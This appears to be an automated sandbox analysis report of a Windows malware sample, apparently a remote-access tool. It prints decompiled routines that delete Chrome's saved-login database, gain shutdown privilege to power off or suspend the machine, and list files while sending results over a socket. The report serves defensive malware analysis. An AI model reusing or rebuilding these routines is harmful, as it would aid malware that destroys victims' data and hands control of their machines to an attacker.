                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115F6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004115FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: 922b75aa52d1aa1445c98a431f73a432095eaf022ec6403613f4270da21e3f41
                                                                                                • Instruction ID: 436a36ce1fa38216c9c77c5b74b32b0117a93525e2a20c85ec909f4fbda10a29
                                                                                                • Opcode Fuzzy Hash: 922b75aa52d1aa1445c98a431f73a432095eaf022ec6403613f4270da21e3f41
                                                                                                • Instruction Fuzzy Hash: 0AE12871A0430067CA14B776CC5B9AE76A89F91308F40092FF947B71E2EE7C8945C29B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041360B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 62%
                                                                                                			E0041360B(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E00414367();
				E00401E3B( &_a16, __edx, _t69, 0);
				_t12 = E00405C1B("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					E00401E3B( &_a12, "0", __eflags);
					_t14 = E00405C1B("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						E00401E3B( &_a12, "1", __eflags);
						__eflags = E00405C1B("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							E00401E3B( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00405C1B("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								E00401E3B( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00405C1B("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E004374E4(_t28, E00401F87(E00401E3B( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E004374E4(_t33, E00401F87(E00401E3B( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E004374E4(_t36, E00401F87(E00401E3B( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				E00401E66( &_a16, _t62);
				E00401FB9();
				E00401FB9();
				return 0;
			}










                                                                                                0x0041360b
                                                                                                0x0041360b
                                                                                                0x00413617
                                                                                                0x00413623
                                                                                                0x0041362c
                                                                                                0x0041362d
                                                                                                0x0041362f
                                                                                                0x00413647
                                                                                                0x00413653
                                                                                                0x0041365c
                                                                                                0x0041365d
                                                                                                0x0041365f
                                                                                                0x0041367a
                                                                                                0x0041368b
                                                                                                0x0041368d
                                                                                                0x004136d4
                                                                                                0x004136d6
                                                                                                0x004136db
                                                                                                0x004136e2
                                                                                                0x004136e7
                                                                                                0x004136e8
                                                                                                0x004136ea
                                                                                                0x004136f4
                                                                                                0x004136f9
                                                                                                0x00413700
                                                                                                0x00413705
                                                                                                0x00413707
                                                                                                0x0041370d
                                                                                                0x0041370e
                                                                                                0x0041370f
                                                                                                0x00000000
                                                                                                0x0041370f
                                                                                                0x004136ec
                                                                                                0x004136ec
                                                                                                0x004136ed
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x0041368f
                                                                                                0x0041368f
                                                                                                0x004136a8
                                                                                                0x004136a8
                                                                                                0x00000000
                                                                                                0x004136a8
                                                                                                0x00413661
                                                                                                0x00413675
                                                                                                0x00000000
                                                                                                0x00413675
                                                                                                0x00413631
                                                                                                0x00413640
                                                                                                0x004136ab
                                                                                                0x004136ad
                                                                                                0x004136ad
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17

                                                                                                APIs
                                                                                                  • Part of subcall function 00414367: GetCurrentProcess.KERNEL32(00000028,?), ref: 00414374
                                                                                                  • Part of subcall function 00414367: OpenProcessToken.ADVAPI32(00000000), ref: 0041437B
                                                                                                  • Part of subcall function 00414367: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041438D
                                                                                                  • Part of subcall function 00414367: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004143AC
                                                                                                  • Part of subcall function 00414367: GetLastError.KERNEL32 ref: 004143B2
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 004136AD
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004136C2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004136C9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState$dhF
                                                                                                • API String ID: 1589313981-768336846
                                                                                                • Opcode ID: 24db37f8f77bbeb8182964a1039d43ad89a956e60e1408e21066733564f16732
                                                                                                • Instruction ID: 0b0ad65eaf52723791abdcf9662898562b440ef97093ca1c4bd3c8b01fd83255
                                                                                                • Opcode Fuzzy Hash: 24db37f8f77bbeb8182964a1039d43ad89a956e60e1408e21066733564f16732
                                                                                                • Instruction Fuzzy Hash: A721B6B061430157CB20BBB29896AAF62599B80309F50093FB547A72D2DE7DCD4A8A5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409F29, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E00409F29(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402076(_t20,  &_v52, E00437AFA(_t20, __eflags, "UserProfile"));
				E004076BB(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401FB9();
				if(DeleteFileA(E00401F87( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402076(_t20, _t28);
						E0040A724(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB9();
				return _t21;
			}













                                                                                                0x00409f29
                                                                                                0x00409f29
                                                                                                0x00409f49
                                                                                                0x00409f4e
                                                                                                0x00409f57
                                                                                                0x00409f6d
                                                                                                0x00409f93
                                                                                                0x00409f95
                                                                                                0x00000000
                                                                                                0x00409f6f
                                                                                                0x00409f76
                                                                                                0x00409f79
                                                                                                0x00409f87
                                                                                                0x00409f89
                                                                                                0x00409f9a
                                                                                                0x00409f9a
                                                                                                0x00409f9f
                                                                                                0x00409fa4
                                                                                                0x00409f80
                                                                                                0x00409f80
                                                                                                0x00409f80
                                                                                                0x00409f79
                                                                                                0x00409fac
                                                                                                0x00409fb7

                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00409F65
                                                                                                • GetLastError.KERNEL32 ref: 00409F6F
                                                                                                Strings
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 00409F95
                                                                                                • UserProfile, xrefs: 00409F35
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00409F30
                                                                                                • [Chrome StoredLogins not found], xrefs: 00409F89
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: 9a9fe7a555929900bd0572798e7eaaecf8adc300ba41119c6a82a0682d9ec2aa
                                                                                                • Instruction ID: ab77fa6c1c073b2ddb725fe74a9ec32399497067327e986f690607c0ddb412c9
                                                                                                • Opcode Fuzzy Hash: 9a9fe7a555929900bd0572798e7eaaecf8adc300ba41119c6a82a0682d9ec2aa
                                                                                                • Instruction Fuzzy Hash: 17018F61A801065ACA04B6B6DD5B8AE7728B911708B50023FF802B62E3FD7A9D45C29B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00414367, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00414367() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                                                                                                0x0041437b
                                                                                                0x0041438d
                                                                                                0x00414399
                                                                                                0x004143a5
                                                                                                0x004143ac
                                                                                                0x004143c1

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00414374
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0041437B
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041438D
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004143AC
                                                                                                • GetLastError.KERNEL32 ref: 004143B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: e32cf0ecdafaeb7bc66f76128e60d35e97101dae4b310d9329eff96bc68064cc
                                                                                                • Instruction ID: 29d46af238e859157db81d8d4cc04ae3e3855c8580ca535270b4c7ff37804c09
                                                                                                • Opcode Fuzzy Hash: e32cf0ecdafaeb7bc66f76128e60d35e97101dae4b310d9329eff96bc68064cc
                                                                                                • Instruction Fuzzy Hash: 92F03AB2801229ABDB109BA0ED0DAEF7F7CEF4571AF210064B905A6052D6348A44CBB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040783D, Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0040783D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t105;
				intOrPtr* _t110;
				signed int _t120;
				void* _t132;
				void* _t153;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				signed int _t184;
				signed int _t186;
				void* _t204;
				char* _t218;
				char* _t219;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t274;
				void* _t276;
				intOrPtr _t277;
				void* _t278;
				void* _t281;

				_t186 = __ecx;
				E00452248(E004537C2, _t274);
				_t277 = _t276 - 0x300;
				_push(_t266);
				 *((intOrPtr*)(_t274 - 0x10)) = _t277;
				_t184 = _t186;
				 *(_t274 - 0x18) = _t184;
				E004020C7(_t184, _t274 - 0x9c);
				 *(_t274 - 0x1c) =  *(_t274 - 0x1c) | 0xffffffff;
				 *_t184 = 0;
				 *(_t274 - 4) =  *(_t274 - 4) & 0x00000000;
				_t261 = _t184 + 4;
				E00404943(_t184 + 4);
				_t105 = E004049DE(_t184 + 4, _t266, _t184 + 4);
				_t283 = _t105;
				if(_t105 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t277 = _t277 - 0x18;
					_t259 = E00402FA9(_t274 - 0x6c, _t274 + 0x38, 0x46e250);
					E00402F85(_t184, _t277, _t178, _t283, _t274 + 0x50);
					_push(0x64);
					_t184 = _t184 & 0xffffff00 | E00404BB7(_t184, _t261, _t178, _t283) == 0xffffffff;
					E00401FB9();
					_t285 = _t184;
					if(_t184 != 0) {
						E00404F18(_t261, _t259);
						 *((intOrPtr*)(_t274 - 0x20)) = 1;
						_push(0x4696f0);
						_t156 = _t274 - 0x20;
						L3:
						_push(_t156);
						L4:
						E00432EDA();
					}
				}
				_t262 = E004022FC(_t274 + 0x20, _t274 - 0x30);
				_t110 = E004022BF(_t274 + 0x20, _t274 - 0x34);
				E00408269(_t274 - 0x3c,  *((intOrPtr*)(E004022FC(_t274 + 0x20, _t274 - 0x38))),  *_t110,  *_t108);
				_t278 = _t277 + 0xc;
				_t253 = _t274 + 8;
				_t268 = FindFirstFileW(E00401EDD(E00407677(_t274 - 0x6c, _t274 + 8, _t285, "*")), _t274 - 0x304);
				 *(_t274 - 0x1c) = _t268;
				E00401EE2();
				_t285 = _t268 - 0xffffffff;
				if(_t268 != 0xffffffff) {
					goto L7;
				} else {
					_t277 = _t278 - 0x18;
					E00402076(_t184, _t277, 0x460734);
					_push(0x65);
					E00404BB7(_t184,  *(_t274 - 0x18) + 4, _t253, _t285);
					E00404F18( *(_t274 - 0x18) + 4, _t253);
					 *((intOrPtr*)(_t274 - 0x24)) = 2;
					_push(0x4696f0);
					_t156 = _t274 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t120 = FindNextFileW(_t268, _t274 - 0x304);
					__eflags = _t120;
					if(_t120 == 0) {
						break;
					}
					_t184 =  *(_t274 - 0x18);
					__eflags =  *_t184;
					if( *_t184 == 0) {
						__eflags =  *(_t274 - 0x304) & 0x00000010;
						if(( *(_t274 - 0x304) & 0x00000010) == 0) {
							L31:
							E00404260(_t184, _t274 - 0x84, _t274 - 0x2d8);
							_t262 = E004022FC(_t274 - 0x84, _t274 - 0x3c);
							_t271 = E004022BF(_t274 - 0x84, _t274 - 0x38);
							E00408269(_t274 - 0x30,  *((intOrPtr*)(E004022FC(_t274 - 0x84, _t274 - 0x34))),  *_t138,  *_t136);
							_t278 = _t278 + 0xc;
							__eflags = E004080DA(_t274 - 0x84, _t274 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								E00401EE2();
								_t268 =  *(_t274 - 0x1c);
								continue;
							} else {
								E00401FC3(_t274 - 0x9c, _t253, _t271, E0040209D(_t184, _t274 - 0x54, _t253, __eflags, _t274 - 0x304, 0x250));
								E00401FB9();
								_t278 = _t278 - 0x18;
								_t253 = E00402F85(_t184, _t274 - 0x54, E00417D8C(_t184, _t274 - 0xb4, _t274 + 8), __eflags, 0x46e250);
								E00402F85(_t184, _t278, _t151, __eflags, _t274 - 0x9c);
								_push(0x66);
								_t153 = E00404BB7(_t184, _t184 + 4, _t151, __eflags);
								__eflags = _t153 - 0xffffffff;
								_t184 = _t184 & 0xffffff00 | _t153 == 0xffffffff;
								E00401FB9();
								E00401FB9();
								__eflags = _t184;
								if(_t184 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t274 - 0x2c)) = 4;
									_push(0x4696f0);
									_t156 = _t274 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t218 = ".";
							_t157 = _t274 - 0x2d8;
							while(1) {
								_t253 =  *_t157;
								__eflags = _t253 -  *_t218;
								if(_t253 !=  *_t218) {
									break;
								}
								__eflags = _t253;
								if(_t253 == 0) {
									L17:
									_t158 = 0;
								} else {
									_t253 =  *((intOrPtr*)(_t157 + 2));
									_t42 =  &(_t218[2]); // 0x2e0000
									__eflags = _t253 -  *_t42;
									if(_t253 !=  *_t42) {
										break;
									} else {
										_t157 = _t157 + 4;
										_t218 =  &(_t218[4]);
										__eflags = _t253;
										if(_t253 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t158;
								if(_t158 == 0) {
									goto L31;
								} else {
									_t219 = L"..";
									_t159 = _t274 - 0x2d8;
									while(1) {
										_t253 =  *_t159;
										__eflags = _t253 -  *_t219;
										if(_t253 !=  *_t219) {
											break;
										}
										__eflags = _t253;
										if(_t253 == 0) {
											L25:
											_t160 = 0;
										} else {
											_t253 =  *((intOrPtr*)(_t159 + 2));
											_t45 =  &(_t219[2]); // 0x2e
											__eflags = _t253 -  *_t45;
											if(_t253 !=  *_t45) {
												break;
											} else {
												_t159 = _t159 + 4;
												_t219 =  &(_t219[4]);
												__eflags = _t253;
												if(_t253 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t160;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t253 = E00408293(_t184, _t274 - 0xb4, _t274 + 8, __eflags, E00404260(_t184, _t274 - 0x54, _t274 - 0x2d8));
											E00403098(_t184, _t274 - 0x6c, _t163, _t262, __eflags, "\\");
											E00401EE2();
											E00401EE2();
											_t281 = _t278 - 0x18;
											E004074B3(_t184, _t281, _t163, __eflags, _t274 + 0x20);
											_t278 = _t281 - 0x18;
											E004074B3(_t184, _t278, _t163, __eflags, _t274 - 0x6c);
											_t171 = E00407C95(_t184, _t163, __eflags);
											__eflags = _t171;
											if(_t171 != 0) {
												E00401EE2();
												goto L31;
											} else {
												 *((intOrPtr*)(_t274 - 0x28)) = 3;
												_push(0x4696f0);
												_t156 = _t274 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t160 = _t159 | 0x00000001;
									__eflags = _t160;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t158 = _t157 | 0x00000001;
							__eflags = _t158;
							goto L19;
						}
						L37:
						E00401FB9();
						E00401EE2();
						E00401EE2();
						E00401FB9();
						_t132 = E00401FB9();
						 *[fs:0x0] =  *((intOrPtr*)(_t274 - 0xc));
						return _t132;
					} else {
						FindClose(_t268);
						_t204 = _t184 + 4;
					}
					L10:
					E00404F18(_t204, _t253);
					goto L37;
				}
				 *(_t274 - 4) =  *(_t274 - 4) | 0xffffffff;
				FindClose(_t268);
				_t263 =  *(_t274 - 0x18);
				_t253 = E00402FA9(_t274 - 0x54, _t274 + 0x38, 0x46e250);
				E00402F85(_t184, _t278 - 0x18, _t123, __eflags, _t274 + 0x50);
				_push(0x67);
				E00404BB7(_t184, _t263 + 4, _t123, __eflags);
				E00401FB9();
				_t204 = _t263 + 4;
				goto L10;
			}






























                                                                                                0x0040783d
                                                                                                0x00407842
                                                                                                0x00407847
                                                                                                0x0040784e
                                                                                                0x00407850
                                                                                                0x00407853
                                                                                                0x00407855
                                                                                                0x0040785e
                                                                                                0x00407863
                                                                                                0x00407867
                                                                                                0x0040786a
                                                                                                0x0040786e
                                                                                                0x00407873
                                                                                                0x0040787b
                                                                                                0x00407880
                                                                                                0x00407882
                                                                                                0x00407c30
                                                                                                0x00407c32
                                                                                                0x00000000
                                                                                                0x00407888
                                                                                                0x00407888
                                                                                                0x004078a2
                                                                                                0x004078a6
                                                                                                0x004078ac
                                                                                                0x004078b8
                                                                                                0x004078be
                                                                                                0x004078c3
                                                                                                0x004078c5
                                                                                                0x004078c9
                                                                                                0x004078ce
                                                                                                0x004078d5
                                                                                                0x004078da
                                                                                                0x004078dd
                                                                                                0x004078dd
                                                                                                0x004078de
                                                                                                0x004078de
                                                                                                0x004078de
                                                                                                0x004078c5
                                                                                                0x004078ef
                                                                                                0x004078f8
                                                                                                0x00407914
                                                                                                0x00407919
                                                                                                0x00407928
                                                                                                0x00407942
                                                                                                0x00407944
                                                                                                0x0040794a
                                                                                                0x0040794f
                                                                                                0x00407952
                                                                                                0x00000000
                                                                                                0x00407954
                                                                                                0x00407954
                                                                                                0x0040795e
                                                                                                0x00407963
                                                                                                0x0040796b
                                                                                                0x00407973
                                                                                                0x00407978
                                                                                                0x0040797f
                                                                                                0x00407984
                                                                                                0x00000000
                                                                                                0x00407984
                                                                                                0x0040798c
                                                                                                0x0040798c
                                                                                                0x00407994
                                                                                                0x0040799a
                                                                                                0x0040799c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004079a2
                                                                                                0x004079a5
                                                                                                0x004079a8
                                                                                                0x004079be
                                                                                                0x004079c5
                                                                                                0x00407acc
                                                                                                0x00407ad9
                                                                                                0x00407aed
                                                                                                0x00407afe
                                                                                                0x00407b18
                                                                                                0x00407b1d
                                                                                                0x00407b31
                                                                                                0x00407b34
                                                                                                0x00407bd1
                                                                                                0x00407bd7
                                                                                                0x00407bdc
                                                                                                0x00000000
                                                                                                0x00407b3a
                                                                                                0x00407b55
                                                                                                0x00407b5d
                                                                                                0x00407b62
                                                                                                0x00407b8c
                                                                                                0x00407b90
                                                                                                0x00407b96
                                                                                                0x00407b9b
                                                                                                0x00407ba0
                                                                                                0x00407ba3
                                                                                                0x00407ba9
                                                                                                0x00407bb4
                                                                                                0x00407bb9
                                                                                                0x00407bbb
                                                                                                0x00000000
                                                                                                0x00407bbd
                                                                                                0x00407bbd
                                                                                                0x00407bc4
                                                                                                0x00407bc9
                                                                                                0x00000000
                                                                                                0x00407bc9
                                                                                                0x00407bbb
                                                                                                0x004079cb
                                                                                                0x004079cb
                                                                                                0x004079d0
                                                                                                0x004079d6
                                                                                                0x004079d6
                                                                                                0x004079d9
                                                                                                0x004079dc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004079de
                                                                                                0x004079e1
                                                                                                0x004079f8
                                                                                                0x004079f8
                                                                                                0x004079e3
                                                                                                0x004079e3
                                                                                                0x004079e7
                                                                                                0x004079e7
                                                                                                0x004079eb
                                                                                                0x00000000
                                                                                                0x004079ed
                                                                                                0x004079ed
                                                                                                0x004079f0
                                                                                                0x004079f3
                                                                                                0x004079f6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004079f6
                                                                                                0x004079eb
                                                                                                0x00407a01
                                                                                                0x00407a01
                                                                                                0x00407a03
                                                                                                0x00000000
                                                                                                0x00407a09
                                                                                                0x00407a09
                                                                                                0x00407a0e
                                                                                                0x00407a14
                                                                                                0x00407a14
                                                                                                0x00407a17
                                                                                                0x00407a1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407a1c
                                                                                                0x00407a1f
                                                                                                0x00407a36
                                                                                                0x00407a36
                                                                                                0x00407a21
                                                                                                0x00407a21
                                                                                                0x00407a25
                                                                                                0x00407a25
                                                                                                0x00407a29
                                                                                                0x00000000
                                                                                                0x00407a2b
                                                                                                0x00407a2b
                                                                                                0x00407a2e
                                                                                                0x00407a31
                                                                                                0x00407a34
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407a34
                                                                                                0x00407a29
                                                                                                0x00407a3f
                                                                                                0x00407a3f
                                                                                                0x00407a41
                                                                                                0x00000000
                                                                                                0x00407a47
                                                                                                0x00407a6b
                                                                                                0x00407a70
                                                                                                0x00407a7c
                                                                                                0x00407a84
                                                                                                0x00407a89
                                                                                                0x00407a92
                                                                                                0x00407a97
                                                                                                0x00407aa0
                                                                                                0x00407aa7
                                                                                                0x00407aac
                                                                                                0x00407aae
                                                                                                0x00407ac7
                                                                                                0x00000000
                                                                                                0x00407ab0
                                                                                                0x00407ab0
                                                                                                0x00407ab7
                                                                                                0x00407abc
                                                                                                0x00000000
                                                                                                0x00407abc
                                                                                                0x00407aae
                                                                                                0x00000000
                                                                                                0x00407a41
                                                                                                0x00407a3a
                                                                                                0x00407a3c
                                                                                                0x00407a3c
                                                                                                0x00000000
                                                                                                0x00407a3c
                                                                                                0x00000000
                                                                                                0x00407a03
                                                                                                0x004079fc
                                                                                                0x004079fe
                                                                                                0x004079fe
                                                                                                0x00000000
                                                                                                0x004079fe
                                                                                                0x00407c57
                                                                                                0x00407c5d
                                                                                                0x00407c65
                                                                                                0x00407c6d
                                                                                                0x00407c75
                                                                                                0x00407c7d
                                                                                                0x00407c85
                                                                                                0x00407c92
                                                                                                0x004079aa
                                                                                                0x004079ab
                                                                                                0x004079b1
                                                                                                0x004079b1
                                                                                                0x004079b4
                                                                                                0x004079b4
                                                                                                0x00000000
                                                                                                0x004079b4
                                                                                                0x00407be4
                                                                                                0x00407be9
                                                                                                0x00407bef
                                                                                                0x00407c0c
                                                                                                0x00407c10
                                                                                                0x00407c16
                                                                                                0x00407c1b
                                                                                                0x00407c23
                                                                                                0x00407c28
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407842
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004078DE
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040793C
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00407994
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004079AB
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                • FindClose.KERNEL32(00000000), ref: 00407BE9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
                                                                                                • String ID:
                                                                                                • API String ID: 4178801697-0
                                                                                                • Opcode ID: c0dd36f45bb29b03b341cc8f12e83686cdbdbd765a526dd0e731187da9d4c9b8
                                                                                                • Instruction ID: ddac6cc700c1d826fe857a47d8fbc5167297111700952098bd10f7650e54566a
                                                                                                • Opcode Fuzzy Hash: c0dd36f45bb29b03b341cc8f12e83686cdbdbd765a526dd0e731187da9d4c9b8
                                                                                                • Instruction Fuzzy Hash: 30C18F719041099ACB14FBA1CD82AED7779AF50308F1041BBE506B71E1EB78AF49CB99
